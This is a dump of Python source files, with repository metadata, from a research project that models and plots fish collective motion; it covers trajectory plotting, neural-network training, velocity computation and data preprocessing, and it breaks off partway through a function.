'idist_{}__{}__type_{}.png'.format(dgrid_str, agrid_str, k))\n plt.close()\n print('Interindividual distance: done')\n\n # trajectory variance plots va grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for igrid, sub_dict3 in sub_dict2.items():\n if igrid == 'all':\n continue\n\n for vagrid, sub_dict4 in sub_dict3.items():\n if vagrid == 'all':\n continue\n\n if (len(sub_dict4['all']) > 0):\n ccycler = cycle(sns.color_palette(new_palette))\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n symmetrized_xy = []\n for idx in sub_dict4['all']:\n seg = segments[idx[0]]\n r1 = np.sqrt((seg[:, idx[1]*2] - args.center[0]) ** 2 +\n (seg[:, idx[1]*2 + 1] - args.center[1]) ** 2)\n phi1 = np.arctan2(\n (seg[:, idx[1]*2 + 1] - args.center[1]), (seg[:, idx[1]*2] - args.center[0]))\n\n if (phi1[args.observation_len] < 0):\n phi1 = np.abs(phi1)\n phi1 = phi1 - phi1[0]\n phi1 = np.array(\n list(map(angle_to_pipi, phi1)))\n\n x = r1 * np.cos(phi1)\n y = r1 * np.sin(phi1)\n symmetrized_xy.append(np.array([x, y]).T)\n\n marker, scale = gen_arrow_head_marker(\n angle_to_pipi(seg[args.observation_len, 15 + idx[1]] - phi1[0]))\n\n c = next(ccycler)\n plt.plot(x, y, linestyle=':', color='k')\n plt.plot(x[0], y[0], marker=marker,\n linestyle='None', color='k', markersize=(scale*4)**2)\n plt.plot(x[-1], y[-1], marker='x',\n linestyle='None', color='k')\n\n if (len(sub_dict4['all']) > 0):\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.3f}'.format(round(igrid[0], 3))\n ub = '{:.3f}'.format(round(igrid[1], 3))\n igrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(vagrid[0], 1))\n ub = '{:.1f}'.format(round(vagrid[1], 1))\n vagrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + \\\n '/' + igrid_str + '/' + vagrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'vangle_{}__{}__{}__{}_type_{}.png'.format(\n dgrid_str, agrid_str, igrid_str, vagrid_str, k)\n )\n\n plt.close()\n\n create_dirs(new_path)\n plot_future_trajectory_variance(\n symmetrized_xy, new_path, k, ax, args)\n print('Viewing angle: done')\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': [], 'dist': [], 'dist_to_wall': []}\n for p in pos:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n data[e]['dist'].append(np.sqrt(\n (p[:, 0] - p[:, 2]) ** 2 + (p[:, 1] - p[:, 3]) ** 2))\n\n dist_mat = []\n for i in range(p.shape[1] // 2):\n distance = args.radius - \\\n np.sqrt(p[:, i * 2] ** 2 + p[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n data[e]['dist_to_wall'].append(dist_mat)\n\n plot_grids(data, path, None, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation 
figure')\n    parser.add_argument('--path', '-p', type=str,\n                        help='Path to data directory',\n                        required=True)\n    parser.add_argument('--radius', '-r', type=float,\n                        help='Radius',\n                        default=0.25,\n                        required=False)\n    parser.add_argument('--timestep', '-t', type=float,\n                        help='Simulation timestep',\n                        required=True)\n    parser.add_argument('--prediction_len', type=int,\n                        help='Predictions to plot',\n                        required=True)\n    parser.add_argument('--observation_len', type=int,\n                        help='Observations to plot',\n                        required=True)\n    parser.add_argument('--type',\n                        nargs='+',\n                        default=['Real', 'Hybrid', 'Virtual'],\n                        choices=['Real', 'Hybrid', 'Virtual'])\n    parser.add_argument('--original_files',\n                        type=str,\n                        default='raw/*processed_positions.dat',\n                        required=False)\n    parser.add_argument('--hybrid_files',\n                        type=str,\n                        default='generated/*generated_positions.dat',\n                        required=False)\n    parser.add_argument('--virtual_files',\n                        type=str,\n                        default='generated/*generated_virtu_positions.dat',\n                        required=False)\n    parser.add_argument('--radius_grid_res',\n                        type=float,\n                        help='Resolution (in m) for the radius of the focal individual in the future trajectory variance plot',\n                        default=0.025,\n                        required=False)\n    parser.add_argument('--angle_grid_res',\n                        type=int,\n                        help='Resolution (in deg) for the angle to the wall of the focal individual future trajectory variance plot',\n                        default=5,\n                        required=False)\n    parser.add_argument('--interdist_grid_res',\n                        type=float,\n                        help='Resolution (in m) for the interindividual distance in the future trajectory variance plot',\n                        default=0.025,\n                        required=False)\n    parser.add_argument('--viewing_angle_grid_res',\n                        type=float,\n                        help='Resolution (in deg) for the viewing angle in the future trajectory variance plot',\n                        default=45,\n                        required=False)\n    parser.add_argument('--center',\n                        type=float,\n                        nargs='+',\n                        help='The centroidal coordinates for the setups used',\n                        default=[0.0, 0.0],\n                        required=False)\n    args = parser.parse_args()\n\n    exp_files = {}\n    for t in args.type:\n        if t == 'Real':\n            exp_files[t] = args.original_files\n        elif t == 'Hybrid':\n            exp_files[t] = args.hybrid_files\n        elif t == 'Virtual':\n            exp_files[t] = args.virtual_files\n\n    plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5068643689155579,
"alphanum_fraction": 0.5121728181838989,
"avg_line_length": 36.67586135864258,
"blob_id": "993d798cbab2d082c2e63d3b90e12dbc439ca412",
"content_id": "61a4cf45a4dcacceb6007c815eb315bb1cef0400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5463,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 145,
"path": "/find/plots/nn/training_history.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\n\nfrom find.plots.common import *\n\n\ndef get_directory_name_at_level(abs_path, depth=0, keep_parents=0):\n path = abs_path\n for _ in range(depth):\n path = os.path.dirname(path)\n\n parents = ''\n if keep_parents > 0:\n parents = [os.path.dirname(path)]\n for _ in range(keep_parents-1):\n parents.append(os.path.dirname(parents[-1]))\n parents = list(map(lambda p: os.path.basename(p) + '/', parents))\n parents = list(reversed(parents))\n parents = ''.join(parents)\n return parents + os.path.basename(path)\n\n\ndef prepare_plot_history(history_files, path, args):\n plot_dict = {}\n min_epoch = np.inf\n for hf in tqdm(history_files, desc='Transforming the history data'):\n with open(hf, \"r\") as file:\n header = file.readline().strip('\\n').split(args.nn_delimiter)\n h = np.loadtxt(hf, skiprows=1, delimiter=args.nn_delimiter)\n\n if 'epoch' in header:\n epoch_idx = header.index('epoch')\n epoch_count = h[:, epoch_idx]\n h = np.delete(h, epoch_idx, axis=1)\n header.remove('epoch')\n else:\n epoch_count = np.array(list(range(h.shape[0])))\n\n if len(epoch_count) < min_epoch:\n min_epoch = len(epoch_count)\n\n for col, quantity in enumerate(header):\n if quantity not in plot_dict.keys():\n plot_dict[quantity] = []\n plot_dict[quantity].append(\n [get_directory_name_at_level(\n hf, 2, args.nn_num_legend_parents), epoch_count, h[:, col]]\n )\n\n for k, v in plot_dict.items():\n for snum, (label, x, y) in enumerate(v):\n if args.nn_last_epoch == -1:\n nn_last_epoch = x.shape[0]\n elif args.nn_last_epoch == -2:\n nn_last_epoch = min_epoch\n else:\n nn_last_epoch = args.nn_last_epoch\n if args.nn_last_epoch > x.shape[0]:\n nn_last_epoch = x.shape[0]\n (label, x, y) = (\n label, x[:nn_last_epoch], y[:nn_last_epoch])\n\n if args.nn_num_sample_epochs > 0:\n sample_epochs = args.nn_num_sample_epochs\n if sample_epochs > x.shape[0]:\n sample_epochs = x.shape[0]\n idcs_keep = np.arange(\n 0, x.shape[0], sample_epochs)\n (label, x, y) = (label, x[idcs_keep], y[idcs_keep])\n\n plot_dict[k][snum] = (label, x, y)\n\n return plot_dict\n\n\ndef plot(exp_files, path, args):\n history_files = []\n for d in args.nn_compare_dirs:\n history_files.append(glob.glob(d + '/logs/history.csv'))\n history_files = [item for sublist in history_files for item in sublist]\n plot_dict = prepare_plot_history(history_files, path, args)\n\n with tqdm(list(plot_dict.keys())) as pbar:\n for it, (k, v) in enumerate(plot_dict.items()):\n palette = sns.color_palette(\n 'Spectral', n_colors=len(history_files))\n ccycler = cycle(palette)\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n pbar.set_description('Plotting {}'.format(k))\n pbar.update(it)\n abs_filename = path + '/' + k + '.png'\n\n plt.figure(figsize=(10, 6))\n ax = plt.gca()\n\n for label, x, y in v:\n sns.lineplot(x=x, y=y, ax=ax, label=label,\n linewidth=uni_linewidth, color=next(ccycler), linestyle=next(linecycler))\n ax.set_xlabel('Epochs')\n ax.set_ylabel(k)\n ax.legend(prop={'size': 4})\n plt.savefig(abs_filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot NN metrics from the training history')\n parser.add_argument('--nn_compare_dirs',\n type=str,\n nargs='+',\n help='List of directories to look through and analyse',\n required=False)\n parser.add_argument('--nn_compare_out_dir',\n type=str,\n help='Directory to output NN analysis results',\n default='nn_comparison',\n required=False)\n 
parser.add_argument('--nn_delimiter',\n type=str,\n help='Delimiter used in the log files',\n default=',',\n required=False)\n parser.add_argument('--nn_last_epoch',\n type=int,\n help='Plot up to nn_last_epoch data points. -1 stands for all, -2 stands for up to the min of iterations across the experiments',\n default=-1,\n required=False)\n parser.add_argument('--nn_num_legend_parents',\n type=int,\n help='Number of parent directories to show in the legend',\n default=1,\n required=False)\n parser.add_argument('--nn_num_sample_epochs',\n type=int,\n help='Number of samples to plot. -1 will consider all available points',\n default=-1,\n required=False)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.4819065034389496,
"alphanum_fraction": 0.48852404952049255,
"avg_line_length": 41.78853225708008,
"blob_id": "316f2a41179566146534dd841c16fbabb6e5dbf2",
"content_id": "a669cc148249f01d30caee4a821de2eed2e4c1c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11938,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 279,
"path": "/find/models/trainer.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport tqdm\nimport argparse\nimport numpy as np\nfrom glob import glob\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory, available_models\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Model to reproduce fish motion')\n parser.add_argument('--files', '-f',\n type=str,\n help='Files to look for',\n default='processed_positions.dat',\n required=False)\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--epochs', '-e',\n type=int,\n help='Number of training epochs',\n default=1000)\n parser.add_argument('--batch_size', '-b',\n type=int,\n help='Batch size',\n default=256)\n parser.add_argument('--learning_rate', '-r',\n type=float,\n help='Learning rate',\n default=0.0001)\n parser.add_argument('--dump', '-d',\n type=int,\n help='Batch size',\n default=100)\n parser.add_argument('--load', '-l',\n type=str,\n help='Load model from existing file and continue the training process',\n required=False)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n parser.add_argument('--reload_state', action='store_true',\n help='Perform the data convertion step from the beginning',\n default=False)\n parser.add_argument('--verbose', action='store_true',\n help='Print messages where possible',\n default=False)\n\n # model selection arguments\n model_selection = parser.add_argument_group('Model selection')\n model_selection.add_argument('--model',\n default=available_models()[0],\n choices=available_models())\n\n # model options\n model_options = parser.add_argument_group('Model options')\n model_options.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n model_options.add_argument('--prediction_steps', type=int,\n help='Trajectory steps to predict',\n default=1)\n model_options.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=5)\n model_options.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n\n # model options\n model_builder = parser.add_argument_group('Model builder options')\n model_builder.add_argument('--model_layers', type=str,\n nargs=\"+\",\n default=['LSTM', 'Dense', 'Dense',\n 'Dense', 'Dense_out'],\n help='NN structure for model builder',\n required=False)\n model_builder.add_argument('--model_neurons', type=int,\n nargs=\"+\",\n default=[32, 25, 16, 10, -1],\n help='NN layer neurons',\n required=False)\n model_builder.add_argument('--model_activations', type=str,\n nargs=\"+\",\n default=['sigmoid', 'sigmoid',\n 'sigmoid', 'tanh', 'None'],\n help='NN layer activations',\n required=False)\n\n # data split\n data_split_options = parser.add_argument_group('Data split options')\n data_split_options.add_argument('--train_fraction',\n type=float,\n help='Validation set fraction',\n default=0.85)\n data_split_options.add_argument('--val_fraction',\n type=float,\n help='Validation set fraction',\n default=0.13)\n data_split_options.add_argument('--test_fraction',\n type=float,\n help='Test set fraction',\n default=0.02)\n\n # logging & stopping criteria options\n logstop_group = 
parser.add_argument_group('Logging & stopping criteria')\n logstop_group.add_argument('--model_checkpoint', action='store_true',\n help='Save the best model as a checkpoint',\n default=False)\n logstop_group.add_argument('--early_stopping', action='store_true',\n help='Enable early stopping if the NN is converging',\n default=False)\n logstop_group.add_argument('--min_delta',\n type=float,\n help='Minimum delta for early stopping',\n default=0.1)\n logstop_group.add_argument('--patience',\n type=int,\n help='Epoch patience for stopping criteria',\n default=10)\n\n logstop_group.add_argument('--enable_tensorboard', action='store_true',\n help='Enable tensorboard logging',\n default=False)\n logstop_group.add_argument('--custom_logs', action='store_true',\n help='Enable custom logging',\n default=False)\n\n lr_scheduler_group = parser.add_argument_group(\n 'Logging & stopping criteria')\n lr_scheduler_group.add_argument('--lr_time_based_decay', action='store_true',\n help='Enable time based decay learning rate',\n default=False)\n\n lr_scheduler_group.add_argument('--lr_exp_decay', action='store_true',\n help='Enable exponential decay learning rate',\n default=False)\n lr_scheduler_group.add_argument('--exp_decay_k',\n type=float,\n help='Exponential decay exponent rate',\n default=0.1)\n args = parser.parse_args()\n\n # data loading is handled here depending on the number of individuals\n # the loader will also handle the data splitting process according\n # to the arguments provided\n loader = Loader(path=args.path)\n model_storage = ModelStorage(args.path)\n\n if args.reload_state:\n pos, files = loader.load(args.files)\n inputs, outputs = loader.prepare(pos, args)\n td, tv, tt = loader.split_to_sets(inputs, outputs, args)\n\n # model storage instance to tidy up the directory and take care of saving/loading\n model_storage.save_sets(td, tv, tt)\n else:\n td, tv, tt = loader.load_from_sets()\n\n model_factory = ModelFactory()\n\n # model can be loaded from file to continue training from snapshot\n init_epoch = 0\n if args.load:\n import os\n\n basename = os.path.basename(args.load)\n if basename == 'latest':\n model_files = glob(os.path.dirname(args.load) + '/model_*.h5')\n\n def epoch_checkpoint(key): return int(\n key.split('_')[-1].split('.')[0])\n model_files.sort(key=epoch_checkpoint, reverse=True)\n args.load = model_files[0]\n\n model = model_storage.load_model(\n args.load, model_factory.model_backend(args.model), args)\n init_epoch = int(os.path.basename(\n args.load).split('_')[-1].split('.')[0]) + 1\n else:\n if 'LSTM' in args.model:\n model = model_factory(\n model_choice=args.model,\n input_shape=(args.num_timesteps, td[0].shape[2]),\n output_shape=td[1].shape[1],\n args=args,\n )\n else:\n model = model_factory(\n model_choice=args.model,\n input_shape=(td[0].shape[1],),\n output_shape=td[1].shape[1],\n args=args,\n )\n\n if model_factory.model_backend(args.model) == 'keras':\n from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard, CSVLogger, LearningRateScheduler\n\n model.summary()\n\n callbacks = []\n\n if args.custom_logs:\n callbacks.append(\n CSVLogger(\n model_storage.get_logs_path() + '/history.csv', separator=',', append=True)\n )\n\n if args.model_checkpoint:\n callbacks.append(\n ModelCheckpoint(\n filepath=model_storage.get_checkpoint_path() + '/best_model.h5',\n monitor='loss',\n save_weights_only=False,\n save_best_only=True))\n\n if args.early_stopping:\n callbacks.append(EarlyStopping(\n monitor=\"loss\",\n 
min_delta=args.min_delta,\n            patience=args.patience,\n            verbose=1))\n\n        if args.enable_tensorboard:\n            callbacks.append(TensorBoard(\n                log_dir=model_storage.get_logs_path(),\n                histogram_freq=1000,\n                write_graph=False,\n                write_images=False,\n                update_freq=\"epoch\",\n                profile_batch=5))\n\n        if args.lr_time_based_decay:\n            starting_lr = args.learning_rate\n            decay = starting_lr / args.epochs\n\n            def lr_time_based_decay(epoch, lr):\n                return lr * 1 / (1 + decay * epoch)\n            callbacks.append(LearningRateScheduler(\n                lr_time_based_decay, verbose=1))\n        elif args.lr_exp_decay:\n            import math\n            starting_lr = args.learning_rate\n            k = args.exp_decay_k\n\n            def lr_exp_decay(epoch, lr):\n                return starting_lr * math.exp(-k * epoch)\n            callbacks.append(LearningRateScheduler(lr_exp_decay, verbose=1))\n\n        # for epoch in range(init_epoch, args.epochs):\n        #     _ = model.fit(td[0], td[1],\n        #                   validation_data=(tv[0], tv[1]),\n        #                   batch_size=args.batch_size,\n        #                   epochs=epoch + 1,\n        #                   initial_epoch=epoch,\n        #                   callbacks=callbacks,\n        #                   verbose=args.verbose)\n\n        _ = model.fit(td[0], td[1],\n                      validation_data=(tv[0], tv[1]),\n                      batch_size=args.batch_size,\n                      epochs=args.epochs,\n                      initial_epoch=init_epoch,\n                      callbacks=callbacks,\n                      verbose=args.verbose)\n\n    # 'epoch' was only defined inside the commented-out loop above; save with the final epoch count\n    model_storage.save_model(\n        model, model_factory.model_backend(args.model), args, args.epochs)\n"
},
{
"alpha_fraction": 0.5537152886390686,
"alphanum_fraction": 0.5684870481491089,
"avg_line_length": 35.62295150756836,
"blob_id": "32c331e01c8ad25a81190b85c8f78628fe24d61b",
"content_id": "4f34ccc34c1854233ef87a39e7a725437050ed43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2234,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 61,
"path": "/find/utils/features.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Derivative:\n def __init__(self, matrix, timestep):\n \"\"\"\n :param positions: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n self._deriv = []\n for m in matrix:\n rolled_m = np.roll(m, shift=1, axis=0)\n deriv = (m - rolled_m) / timestep\n sigma = np.std(deriv[1:, :], axis=0)\n mu = np.mean(deriv[1:, :], axis=0)\n x_rand = np.random.normal(mu[0], sigma[0], m.shape[1] // 2)[0]\n y_rand = np.random.normal(mu[1], sigma[1], m.shape[1] // 2)[0]\n for i in range(m.shape[1] // 2):\n deriv[0, i * 2] = deriv[1, i * 2] + x_rand\n deriv[0, i * 2 + 1] = deriv[1, i * 2] + y_rand\n self._deriv.append(deriv)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant derivatives for each of the matrices provided to the class\n \"\"\"\n return self._deriv\n\n\nclass Velocities(Derivative):\n \"\"\"Simplistic instantaneous velocity computation.\"\"\"\n\n def __init__(self, positions, timestep):\n \"\"\"\n :param positions: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n super().__init__(positions, timestep)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant velocities for each of the matrices provided to the class\n \"\"\"\n return super().get()\n\n\nclass Accelerations(Derivative):\n \"\"\"Simplistic instantaneous accelaration computation.\"\"\"\n\n def __init__(self, velocities, timestep):\n \"\"\"\n :param velocities: list(np.array) of (x_1, y_1, ..., x_n, y_n) position matrices of fish individuals\n :param timestep: float time interval between each measurement (sampling rate)\n \"\"\"\n super().__init__(velocities, timestep)\n\n def get(self):\n \"\"\"\n :return: list(np.array) of resultant acceleration for each of the matrices provided to the class\n \"\"\"\n return super().get()\n"
},
{
"alpha_fraction": 0.48539310693740845,
"alphanum_fraction": 0.49605438113212585,
"avg_line_length": 40.72983932495117,
"blob_id": "111ebc925281bae12e302805eac09b218315e9ee",
"content_id": "4185d8ba93829cddc8a2b86b595c2ce33d232e31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31047,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 744,
"path": "/find/utils/preprocess.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport tqdm\nimport argparse\nimport datetime\nimport glob\nimport numpy as np\nimport os\nimport socket # for get hostname\nfrom pathlib import Path\nfrom word2number import w2n\nfrom pprint import pprint\nfrom copy import copy, deepcopy\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\n\nclass Archive:\n \"\"\"Serialization class for the fish experiments.\"\"\"\n\n def __init__(self, args={}):\n \"\"\"\n :param args: dict, optional of generic arguments for the class\n \"\"\"\n if args.out_dir:\n self._experiment_path = args.out_dir\n else:\n self._hostname = socket.gethostname()\n self._timestamp = datetime.date.today().strftime('%Y_%m_%d') + '-' + \\\n datetime.datetime.now().strftime('%H_%M_%S')\n self._experiment_path = self._hostname + '_' + self._timestamp\n\n if not os.path.exists(self._experiment_path):\n os.makedirs(self._experiment_path)\n\n def path(self):\n \"\"\"\n :return: Path to the experiment folder that was created in the constructor\n \"\"\"\n return Path(self._experiment_path)\n\n def save(self, data, filename):\n \"\"\"\n :param data: np.array of arbitrary numerical data\n :param filename: str filename for the output data file\n \"\"\"\n if isinstance(data, (np.ndarray, np.generic)):\n np.savetxt(self.path().joinpath(filename), data)\n else:\n assert False, 'Can not store data structures of this type'\n\n\ndef load(exp_path, fname, has_probs=True, has_heading=False):\n \"\"\"\n :param exp_path: str path to the experiment folder where the data we want to load are stored\n :param fname: str the name of the files we want to load\n :return: tuple(list(np.array), list) of the matrices and corresponding file names\n \"\"\"\n files = glob.glob(exp_path + '/**/' + fname)\n data = []\n for f in files:\n matrix = np.loadtxt(f, skiprows=1)\n if has_probs:\n matrix = np.delete(matrix, np.s_[2::3], 1)\n if has_heading:\n matrix = matrix[:, 1:]\n matrix = np.delete(matrix, np.s_[2::3], 1)\n\n data.append(matrix)\n return data, files\n\n\ndef preprocess(data, files, filter_func, args={'scale': 1.0}):\n \"\"\"\n :param data: list(np.array) of position data for different fish individuals or experiments\n :param files: list(str) of position files\n :param filter_func: func that will apply a smoothing on the data\n :param args: dict, optional for extra arguments that need to be passed to this function\n :return: list(np.array), ExperimentInfo\n \"\"\"\n # every matrix should have the same number of rows\n if 'initial_keep' in args.keys():\n for i in range(len(data)):\n skip = data[i].shape[0] - args['initial_keep']\n data[i] = data[i][skip:, :]\n\n # invert the Y axis if the user want to (opencv counts 0, 0 from the top left of an image frame)\n for i in range(len(data)):\n if args['invertY']:\n resY = args['resY']\n for n in range(data[i].shape[1] // 2):\n data[i][:, n * 2 + 1] = resY - data[i][:, n * 2 + 1]\n\n for i in tqdm.tqdm(range(len(data)), desc='Interpolating'):\n data[i] = interpolate(data[i], args)\n\n info = ExperimentInfo(data)\n\n if 'diameter_allowed_error' in args.keys():\n diameters = []\n for i in range(len(data)):\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n diameters.append(maxdh)\n diameter_thres = np.median(diameters) * args['diameter_allowed_error']\n diameter_diff = [np.abs(x - np.median(x)) for x in diameters]\n\n # pixel to meter convertion\n for i in 
range(len(data)):\n # this step should roughly convert pixels to meters\n print('experiment_' + str(i))\n if args['scale'] < 0:\n assert ('radius' in args.keys(\n )), 'Automatic scaling factor computation requires knowledge of the radius'\n\n xmin = info.globalMinXY()[0]\n xmax = info.globalMaxXY()[0]\n ymin = info.globalMinXY()[1]\n ymax = info.globalMaxXY()[1]\n maxd = max([xmax-xmin, ymax-ymin])\n\n if 'use_global_min_max' in args.keys() and not args['use_global_min_max']:\n xminh = info.minXY(i)[0]\n xmaxh = info.maxXY(i)[0]\n yminh = info.minXY(i)[1]\n ymaxh = info.maxXY(i)[1]\n maxdh = max([xmaxh-xminh, ymaxh-yminh])\n\n if 'diameter_allowed_error' in args.keys() and diameter_diff[i] > diameter_thres:\n maxd = maxdh\n\n a = 2 * args['radius'] / maxd\n data[i] = data[i] * a\n else:\n data[i] = data[i] * args['scale']\n\n info = ExperimentInfo(data)\n info.printInfo()\n\n # here we attempt to address the tracking misclassification of the trajectories causing sudden jumps\n for i in tqdm.tqdm(range(len(data)), desc='Disentangling trajectories'):\n data[i] = correct_trajectories(data[i], args)\n\n # this is the main filtering function selected by the user. Although even the jumping can be included in this section\n # we opted to separate the two so as to allow more freedom for people that want to implement custom functions\n idcs_remove = []\n for i in tqdm.tqdm(range(len(data)), desc='Filtering'):\n data[i] = filter_func(data[i], args)\n if data[i].shape[0] < (args['min_seq_len'] / (args['timestep'] / args['centroids'])):\n idcs_remove.append(i)\n\n idcs_removed = 0\n for i, idx in tqdm.tqdm(enumerate(idcs_remove), desc='Removing small files after filtering'):\n del data[idx - idcs_removed]\n del files[idx - idcs_removed]\n idcs_removed += 1\n\n # remove jumping instances, that is, if an individual travels an unusually great distance\n # which could be an indication that the tracking was momentarily confused\n idx_correction = {}\n if 'jump_threshold' in args.keys():\n odata = deepcopy(data)\n oinfo = ExperimentInfo(odata)\n data, files, idx_correction = correct_jumping(data, files, args)\n\n idcs_remove = []\n for i in range(len(data)):\n # skip files that are less than args['min_seq_len'] seconds long\n if data[i].shape[0] < (args['min_seq_len'] / (args['timestep'] / args['centroids'])):\n idcs_remove.append(i)\n\n idcs_removed = 0\n for idx in tqdm.tqdm(idcs_remove, desc='Removing small files'):\n del data[idx - idcs_removed]\n del files[idx - idcs_removed]\n k = list(idx_correction.keys())[idx-idcs_removed]\n del idx_correction[k]\n idcs_removed += 1\n\n # filtering the data with a simple average (by computing the centroidal position)\n if 'centroids' in args.keys() and args['centroids'] > 1:\n while not data[0].shape[0] % args['centroids'] == 0:\n for i in range(len(data)):\n data[i] = data[i][1:, :]\n assert data[0].shape[0] % args['centroids'] == 0, 'Dimensions do not match'\n\n for i in range(len(data)):\n centroidal_coord = []\n for bidx in range(0, data[i].shape[0], args['centroids']):\n centroidal_coord.append(np.nanmean(\n data[i][bidx:bidx + args['centroids'], :], axis=0))\n data[i] = np.array(centroidal_coord)\n\n # compute setup limits\n info = ExperimentInfo(data)\n\n if 'jump_threshold' in args.keys():\n for k, idx in idx_correction.items():\n i = list(idx_correction.keys()).index(k)\n minXY = oinfo.minXY(idx)\n maxXY = oinfo.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n\n # center the data around (0, 0)\n if 'center' in args.keys() and 
args['center']:\n data, info = Center(data, info, args).get()\n if 'jump_threshold' in args.keys():\n odata, oinfo = Center(odata, oinfo).get()\n for i, (k, idx) in enumerate(idx_correction.items()):\n minXY = oinfo.minXY(idx)\n maxXY = oinfo.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n\n # normlize data to get them in [-1, 1]\n if 'normalize' in args.keys() and args['normalize']:\n data, info = Normalize(data, info, args).get()\n if 'jump_threshold' in args.keys():\n odata, oinfo = Normalize(odata, oinfo).get()\n for i, (k, idx) in enumerate(idx_correction.items()):\n minXY = info.minXY(idx)\n maxXY = info.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n return data, info, files\n\n\ndef last_known(data, args={}):\n \"\"\"\n :brief: the function will fill in the missing values by replacing them with the last known valid one\n\n :param data: np.array matrix with missing values that need to be filled in\n :param args: dict, optional extra arguments provided to the function\n :return: np.array matrix without missing values\n \"\"\"\n filtered_data = []\n for i in range(data.shape[0]):\n row = data[i]\n if np.isnan(row).any():\n idcs = np.where(np.isnan(row) == True)\n if len(filtered_data) < 1:\n continue\n else:\n for idx in idcs[0]:\n row[idx] = filtered_data[-1][idx]\n filtered_data.append(row)\n return np.array(filtered_data)\n\n\ndef nan_helper(y):\n \"\"\"\n :param y: np.array of values\n :return: tuple(np.array, lambda) of the nan value indices and a lambda value that applies a transformation on those\n \"\"\"\n return np.isnan(y), lambda z: z.nonzero()[0]\n\n\ndef interpolate(data, args={}):\n \"\"\"\n :brief: the function will replace missing values by interpolating neighbouring valid ones\n\n :param data: np.array matrix with missing values that need to be filled in\n :param args: dict, optional extra arguments provided to the function\n :return: np.array matrix without missing values\n \"\"\"\n for col in range(data.shape[1]):\n nans, x = nan_helper(data[:, col])\n data[nans, col] = np.interp(x(nans), x(~nans), data[~nans, col])\n return data\n\n\ndef correct_trajectories(data, args={}):\n for i in range(1, data.shape[0]):\n for ind in range(data.shape[1] // 2):\n ref = data[i, (ind * 2): (ind * 2 + 2)]\n distances = 